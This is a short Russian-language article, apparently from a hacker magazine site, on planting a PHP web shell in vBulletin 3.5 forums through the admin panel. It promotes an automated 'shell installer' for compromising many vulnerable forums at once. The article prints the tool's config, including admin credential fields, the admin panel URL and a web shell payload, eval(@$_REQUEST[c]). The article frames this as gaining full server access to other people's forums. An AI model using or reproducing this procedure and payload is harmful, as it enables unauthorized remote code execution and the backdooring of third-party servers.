Частенько на просторах Сети встречаются
бажные форумы, через которые, порой, очень хочется залить шелл,
дабы обрести полноценный доступ к серверу :). Популярный
форумный двиг vBulletin aka булка - не исключение. Залить шелл
через админку сего продукта довольно просто. Для этого следует:

  1. Поиметь админский аккаунт (только не спрашивай меня:
    «как?»)
  2. Залогиниться в админке
  3. Добавить новый модуль с телом нашего шелла (не более 60
    Кб)

Однако, когда бажных форумов много, а времени - мало,
разумнее заливать шеллы в автоматическом режиме, благо,
специально для этих целей был написан «vBulletin shell
installer» от товарища DeusTirael. Все, что от тебя требуется -
подправить пару строк в конфиге скрипта, а именно:

$login = "admin"; // логин админа
форума
$passw = "password"; // пароль админа форума
$cookies = ""; // куки
$admincp = "http://blablabla.com/vbl/admincp/"; // полный
http-линк до админки
$pltitle = "plugin"; // plugin title
$shellcode = 'eval(@$_REQUEST[c]);'; // код пхп-шелла

P.S. Скрипт успешно работает с vBulletin
3.5.*.

Теги:

Check Also

Изучаем ПЛК. Краткий гайд по поиску уязвимостей в промышленных контроллерах

Если ты думаешь, что контроллеры, которые ставят в зданиях и на заводах, защищены намного …

Оставить мнение